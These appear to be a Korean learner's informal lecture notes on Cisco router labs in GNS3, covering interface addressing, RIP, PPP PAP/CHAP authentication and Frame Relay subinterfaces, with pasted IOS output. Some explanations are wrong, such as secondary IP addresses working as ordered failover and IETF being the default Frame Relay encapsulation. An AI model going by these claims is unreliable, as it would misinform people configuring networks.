에서 1기가 영화 다운받는다하면, 1초 걸림~ 캬~ 근데 ethernet은 3일거림..ㅎㅎ
700mb영화다운받는데 일주일씩 걸림..옛날에는...ㄷㄷfastEthernet은 1기가 영화 보통 5분정도걸림
근데 못하죠? 왜죠? 실제 속도는 낮은 속도니까..
기가비타는 비싸여~
그래서 보통은 fastethernet쓰져
아이러니한건, 우리가 인터넷 광국인데 옛날말, 필리핀 대도시가 더 빠름 ㅎㅎ 맞음 이미 초월된지 오래임 ;
미국은 대도시만 빠르지, 퇴근하구 집가면, 모뎀으로 하는거지, 쓰는만큼 돈 내고 함
미국 시골집들은 그렇게 인터넷하면 느리니까 위성으로 하는거지;캬 천조국 클라스;;
내 랜카드는 ethernet이야. 우리집은 gigabitethernet신청했어-->응 속도 안나;
컴터 랜카드도 속도 보고 사야함. 그리고 그 랜카드에 맞는 서비스를 신청해야함
그래서 as기사들이 집가면, pc랜카드가 느린데..속도 안나온다고 난리치면 이제 설명해주는거지ㅠㅠ
고통..
C:\Windows\system32>ipconfig/all
Windows IP 구성
호스트 이름 . . . . . . . . : Eclass-01
주 DNS 접미사 . . . . . . . :
노드 유형 . . . . . . . . . : 혼성
IP 라우팅 사용. . . . . . . : 아니요
WINS 프록시 사용. . . . . . : 아니요
이더넷 어댑터 이더넷:
연결별 DNS 접미사. . . . :
설명. . . . . . . . . . . . : Realtek Gaming 2.5GbE Family Controller (대만 realtek 회사 게이밍용이기고 2.5기가비트~랜카드~
물리적 주소 . . . . . . . . : D8-BB-C1-57-1E-A2
DHCP 사용 . . . . . . . . . : 아니요
자동 구성 사용. . . . . . . : 예
IPv4 주소 . . . . . . . . . : 192.168.10.11(기본 설정)
서브넷 마스크 . . . . . . . : 255.255.255.0
기본 게이트웨이 . . . . . . : 192.168.10.1
DNS 서버. . . . . . . . . . : 8.8.8.8
168.126.63.1
Tcpip를 통한 NetBIOS. . . . : 사용
ip add 172.16.1.0 255.255.255.0
bad mask /24 for address 172.16.1.0 네트워크 주소라서 안됨
네트워크 주소, 브로드캐스트 주소, 게이트웨이 주소는 다 오류납니당~
ip add 172.16.1.254 255.255.255.0
no sh
sh ip int br 하고 확인
SEOUL#sh ip int br
Interface IP-Address OK? Method Status Prot ocol
Ethernet0/0 172.16.1.254 YES manual up up
만약 첫번째꺼가 동작 안하면 secondary ip가 동작하는거임
ip add 172.16.20.1 255.255.255.0 secondary
참고로 third는 없음. why? secondary 붙이면 알아서 작동함
예를 들어 secondary 1
secondary 2 secondary 3 이케 설정해두면, 1 오류->2 오류-> 3..쭉쭉 갑니다
ip add 172.16.20.1 255.255.255.0 secondary
sh run
interface Ethernet0/0
ip address 172.16.20.1 255.255.255.0 secondary
ip address 172.16.1.254 255.255.255.0
-------------------------------------------------------------------------------------------------------
라우터<---->라우터 연결할려면 wan 프로토콜이 설정되어야한다
wan 프로토콜은 5개
Frame-Relay, ISDN, HDLC, PPP, ATM
frame-relay 우리나라는 안씀, 미국이랑 일본은 씀. 속도가 너무 느려서 안씀. 우린 vpn을 씀~
ISDN도 예전에 쓰던건데, 전화기로 전화만 해요? 문자도 보내고, 메일도 하고, 티비도 보고
맞아요 종합통신망이 isdn이에요~
전화기 원래 목적은 뭐에요? 전화죠~문자랑 소리를 별도로 관리하는거죵
ppp-point to point 1대1로 연결하는거임. 전화번호 대신에 쓰던거
atm ATM은 시간에민감한트래픽문제때문에도입된프로토콜로음성, 영상,
데이터를동시에전송할수있으며이프로토콜은패킷이아닌53Byte 고정 길이의셀을사용한다
default는 HDLC임
wan프로토콜은 같아야함. 다르면 통신 안됨. 양쪽은 맞춰야함
leased lines 인터넷 회사isp에서 한걸 우리가 대여해서 쓰는거임
Circuit Switching 전화기라 생각하면됨. 옛날에는 서울로 전화하고 싶다? 전화국에서 중간에 연결해줘야했었음 지금은 컴터가 알아서해줌
군대가 지금 이방식이라 생각하면됨 통신병
Packet Switching은 요새 인터넷 연결 사용방법
gns3 명령어
shift 누른상태에서 라우터 누르면 갯수 적고 한번에 나옴 올 ㅋㅋ
검정색 실선은 내부 연결이라는 뜻
번개모양 실선은 인터넷으로 연결됐다는 외부 연결이라는 뜻
라우터에 연결된 선이 3개? 네트워크 세개~
3개의 아이피 대역이 나와야함
선하나당 아이피 대역이 다른거임
R3랑 R4 하나씩 따서 34
R4랑 R5 하나씩 따서 45
PC3번이니까 172.16.2.3
PC4번이니까 172.16.2.4
아이피 넣기전에 구성도짜는데 이 구성도를 LAB이라고함
자 아이피 들어가봅시다~
PC부터~
ip 172.16.1.1/24 172.16.1.254 ~~쭉쭉
ip 172.16.1.2/24 172.16.1.254
ip 172.16.2.3/24 172.16.2.254
ip 172.16.2.4/24 172.16.2.254
---------------------------------------------------------
라우터 ip 주러 가봅시다
[R1]
conf t
int e0/0
ip add 172.16.1.254 255.255.255.0
no sh
int s2/0
ip add 172.16.12.1 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
[R2]
conf t
int e0/0
ip add 172.16.2.254 255.255.255.0
no sh
int s2/0
ip add 172.16.12.2 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
시리얼을 연결할땐 전원끄고 설정해야함
키고하면 랜카드 나가여~
선을 다 연결해놓고 전원을 켜야한다는얘기임!
시리얼 포트는 절대적으로 연결 끄고해야함
아니면 랜카드 빠이에여~
이더넷은 상관 xx
sh int s2/0
R1#sh int s2/0
Serial2/0 is up, line protocol is up
Hardware is M4T
Internet address is 172.16.12.1/24
MTU 1500 bytes, BW 1544 Kbit/sec, DLY 20000 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation HDLC, crc 16, loopback not set <---------------프로토콜 HDLC라는거임
Keepalive set (10 sec)
Restart-Delay is 0 secs
Last input 00:00:02, output 00:00:03, output hang never
Last clearing of "show interface" counters never
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: fifo
Output queue: 0/40 (size/max)
5 minute input rate 0 bits/sec, 0 packets/sec
5 minute output rate 0 bits/sec, 0 packets/sec
128 packets input, 9814 bytes, 0 no buffer
Received 105 broadcasts (19 IP multicasts)
0 runts, 0 giants, 0 throttles
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
154 packets output, 12120 bytes, 0 underruns
0 output errors, 0 collisions, 2 interface resets
0 unknown protocol drops
0 output buffer failures, 0 output buffers swapped out
3 carrier transitions DCD=up DSR=up DTR=up RTS=up CTS=up
conf t
int s/20
encapsulation ppp하고
핑 하면 안떨어짐요
Encapsulation PPP, LCP REQsent, crc 16, loopback not set
R1 WAN프로토콜이 PPP고
R2 WAN 프로토콜이 HDLC라서 안되는거임
R2(config-if)#encapsulation ppp
R2(config-if)#end
R2#
*Dec 3 06:00:43.753: %SYS-5-CONFIG_I: Configured from console by console
*Dec 3 06:00:43.975: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
R1 WAN PROTOCOL PPP
R2 WAN PROTOCOL PPP
R1----------------R2---------------R3
HDLC PPP
R1 R3 통신됩니다!!
R1입장에서는 인접된 라우터끼리만 프로토콜 맞추면 연결되거든R3가 PPP는 뭐든 상관X
ppp 인증 설정할꺼임
라우터 배우다가 인증할게요 나오면 ccnp로 올라가는거에요(상위레벨로_
why 보안이니까~더어려워~
int s2/0
ppp authentication [pap|chap] pap는 passwd보이고 chap password안보여요
누가 나한테 다 선 꼽으면 바로 ppp연결 가능
위험하니까 암호 거는거임
상대방이 나한테 들어올때 그 계정을 만드는거임!
r1이 r2한테 전달하는거예요
r2에서만드는거임
난 r1으로 로그인할꼬양
r2:난 r1으로 로그인할꼬양
r1:난 r1으로 로그인할꼬양
근데 만약 r1만 인증하구 r2는 인증안했다? 핑안됨
r1: 난 인증했는데..
r2: 난 인증안했오..
네트워크 x
sh running-config 해야 ppp pap 된게 보임
sh int s2/0하면 안보임
interface Serial2/0
ip address 172.16.12.1 255.255.255.0
encapsulation ppp
ppp authentication pap
ppp pap sent-username R1 password 0 cisco
serial restart-delay 0
xshell5
edit
prefernces
console applications
console settings
xshell5
한다음
xshell5열고 거기서 도구 키입력을 모두 세션으로 클릭하면
r1에서 wr하면 여기 열려있는 세션 전부다 wr 해지는거임 꿀 ㅋ
config를 메모장에 쓰고 이걸 현장에선 팀장이랑 전부 다 체크 한다음
들어감. 그래서 에러 뜨면, 부장님 책임이에요~!
저 무슨 작업해요 라고 얘기하고 결제하는거임!
내 밑에가 스위치가 만대라 생각하면됨
내가 enter잘못치면 다 날라가요~ 죽어요 그냥~
R2
sh running-config한다음
int s2/1에서
ppp pap sent-username R3 password 0 cisco
이거 확인하고
conf t
int s2/1들어가서
no ppp pap sent-username R2 password 0 cisco 하면 지워짐
end
다시 sh running-config한 다음 삭제 됐는지 확인한 후
ppp chap 세팅해줄꺼임
conf t
int s2/1
ppp authentication chap
exit
username R3 password cisco
int s2/1
ppp authentication chap
R3
sh running-config한다음
int s2/0에서
ppp pap sent-username R2 password 0 cisco
이거 확인하고
conf t
int s2/0들어가서
no ppp pap sent-username R2 password 0 cisco 하면 지워짐
end
다시 sh running-config한 다음 삭제 됐는지 확인한 후
ppp chap 세팅해줄꺼임
conf t
int s2/0
ppp authentication chap
exit
username R2 password cisco
int s2/0
ppp authentication chap
-----------------------------------------------------------------------------------
1203-2_FR LAB 세팅 시작
frame relay switch 오류나서 winpcap 깔구 다시 하면 오류안뜸 굳 ㅋㅋ
r1에서 r2로 가는거임
PC1
ip 172.16.1.1 255.255.255.0 172.16.1.254
PC2
ip 172.16.1.2 255.255.255.0 172.16.1.254
PC3
ip 172.16.2.3 255.255.255.0 172.16.2.254
PC4
ip 172.16.2.4 255.255.255.0 172.16.2.254
PC5
ip 172.16.3.5 255.255.255.0 172.16.3.254
PC6
ip 172.16.3.6 255.255.255.0 172.16.3.254
R1
conf t
int e0/0
ip add 172.16.1.254 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy r start
R2
conf t
int e0/0
ip add 172.16.2.254 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy r start
R3
conf t
int e0/0
ip add 172.16.3.254 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy r start
--------------------------------------------------------------------------
wan protocol 중 frame-ray 배울꺼임
R1(config)#int s2/0
R1(config-if)#en
R1(config-if)#encapsulation ?
atm-dxi ATM-DXI encapsulation
bstun Block Serial tunneling (BSTUN)
frame-relay Frame Relay networks
hdlc Serial HDLC synchronous
lapb LAPB (X.25 Level 2)
ppp Point-to-Point protocol
sdlc SDLC
sdlc-primary SDLC (primary)
sdlc-secondary SDLC (secondary)
smds Switched Megabit Data Service (SMDS)
stun Serial tunneling (STUN)
x25 X.25
R1(config-if)#encapsulation fr
R1(config-if)#encapsulation frame-relay ?
MFR Multilink Frame Relay bundle interface
ietf Use RFC1490/RFC2427 encapsulation
<cr>
R1(config-if)#encapsulation frame-relay ietf
R1(config-if)#no sh
*Dec 3 08:34:16.704: %LINK-3-UPDOWN: Interface Serial2/0, changed state to up
R1(config-if)#
*Dec 3 08:34:27.713: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
ietf는 default라서 굳이 안붙이고 그냥 encapsulation frame-relay만 쳐도 ietf 적용됨
인터페이스를 논리적으로 쪼개는거임(.)이 서브 인터페이스 지원하는거임 p는 point약자
r1이 r2랑 r1이 r3랑 연결한다는거임
이제 우린 42억개 사용가능 ㅋㅋ
int s2/0.12 p
R1(config-if)#int s2/0.12 p
R1(config-subif)# <----서브 인터페이스로 들어간거임
R1(config-subif)#ip add 172.16.12.1 255.255.255.0 <------no sh 안해도됨 why? 논리선이라서
no sh은 물리선 int s2/0만 줘야함
R1(config-if)#int s2/0.12 p
R1(config-subif)#ip add 172.16.12.1 255.255.255.0
R1(config-subif)#FRAM
R1(config-subif)#FRAMe-relay int
R1(config-subif)#FRAMe-relay interface-dlci 102
R1(config-fr-dlci)#
DLCI는 Data Link Connection Identifier의 약자입니다
[Frame-Relay R1]
conf t
int s2/0
no sh
encapsulation frame-relay
int s2/0.12 p
ip add 172.16.12.1 255.255.255.0
frame-relay interface-dlci 102
int s2/0.13 p
ip add 172.16.13.1 255.255.255.0
frame-relay interface-dlci 103
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
[Frame-Relay R2]
conf t
int s2/0
no sh
encapsulation frame-relay
int s2/0.12 p
ip add 172.16.12.2 255.255.255.0
frame-relay interface-dlci 201
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
[Frame-Relay R3]
conf t
int s2/0
no sh
encapsulation frame-relay
int s2/0.13 p
ip add 172.16.13.3 255.255.255.0
frame-relay interface-dlci 301
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
interface Serial2/0.21 point-to-point
ip address 172.16.12.2 255.255.255.0
frame-relay interface-dlci 201
!
interface Serial2/0.31 point-to-point
ip address 172.10.13.3 255.255.255.0
frame-relay interface-dlci 301
아 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ아이피이슈....
ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ